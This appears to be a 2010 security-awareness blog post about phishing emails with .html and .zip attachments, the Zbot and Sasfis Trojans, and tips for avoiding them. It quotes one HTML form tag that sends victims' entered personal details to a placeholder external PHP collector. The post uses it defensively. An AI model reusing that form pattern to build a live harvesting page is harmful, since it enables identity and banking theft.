The rise of Spam and Phishing emails carrying attachments
Posted by Minal Pithia on Wed, Oct 13, 2010
Are you overloaded with unwanted spam messages in your inbox with subject headings like “Your wife’s photo’s attached,” “Resume,” “Join my network on LinkedIn,” or “Online banking verification”? I am sure that many of us have seen emails like these in our inboxes. They not only frustrate us but also underline the importance of protecting ourselves from identity theft. The Sasfis and ZBot malware campaigns that continue to spread across the internet illustrate how spam messages carrying malicious attachments have hit an all-time high this year. Recent research by Symantec indicates that spam volume has increased by 10% from May to July, with the US being one of the top nations for sending spam. According to Symantec’s monthly report, “State of Spam and Phishing”: “Malware spam more than tripled in volume and .zip attachment spam saw a four-fold increase month-over-month. In addition to the .zip attachment, there was a wave of .html attachments with malicious JavaScript”. Here at BrandProtect we are seeing an increase in .html form phishing scams targeting many of our clients.
What are phishing scams with .html attachments?
Perpetrators send out a phishing email that arrives in someone’s inbox carrying an attachment, most commonly titled “online Banking verification.html”.

Once you open the attachment, you are presented with an HTML form that asks you for personal information. When you enter and submit your information, the data is sent to a PHP or HTML file hosted on an external domain, which stores it for the perpetrators. Analyzing the source code of the form reveals the URL of that script, which looks similar to http://somethingdomain/~info/AccountVerification/cf.php. This is where the data is sent when the recipient presses the submit button. Here is an excerpt of what the source code looks like:
<form name="Form1" method="post" action="http://somethingdomain/~info/AccountVerification/cf.php" id="Form1" onsubmit="return check(document.Form1.all)">
Below you will see an example of a type of form that recipients are directed to once they open the html attachment.

After you press submit you are then auto-directed to the legitimate banking page, which makes the attack “seem” authentic.
Sasfis and Zbot Malware Campaign and .zip attachments
Along with .html attachments, we’ve also seen a wave of spam messages with .zip attachments. The Symantec “State of Spam and Phishing” report indicates how both Sasfis and Zbot were used to send out alarming and enticing messages like “fake celebrity news” and messages using a variety of shipping/delivery service brands. An interesting point noted by Symantec was, “Rather than attaching the images, spammers started to zip the images and send the .zip attachment instead. This combined with two Trojans mentioned above made up vast majority of .zip attachment spam.”
Subject headings like “your wife’s photos attached” and “Resume,” according to Symantec, were among the top 5 subject lines used for spam. These subjects give spammers a greater opportunity to infect a machine as they tempt recipients by creating a sense of curiosity. We all need to be aware of these types of spam messages and educate ourselves about malicious attachments that threaten our identity and personal information.
Symantec describes Trojan Zbot as a Trojan that steals confidential information from compromised computers, primarily targeting system information, online credentials and banking details. Trojan Sasfis is a “Trojan horse that downloads and executes other malicious content. During August, spammers used a variety of shipping delivery service brands to trick users.”
With any phishing scam or spam message, the goal of the perpetrator is to create a message with an attractive subject heading that will entice, alarm and urge recipients to open the email attachment. It is important for us to stay alert and to educate and protect ourselves against online identity theft.
How to protect yourself from malicious email attachments
- Never open email attachments from “unknown” senders
- Pay close attention to the subject heading and who the email is supposedly from
- Reputable organizations will never send you attachments with .html, .exe, .zip …
- Do not buy any product or services from spam messages
- Never fill out forms that ask for personal information
- Do not reply to the spam message
** For a more detailed look at do’s and don’ts regarding spam and phishing, check out the Checklist: Protecting your business, your employees and your customers, outlined by Symantec. **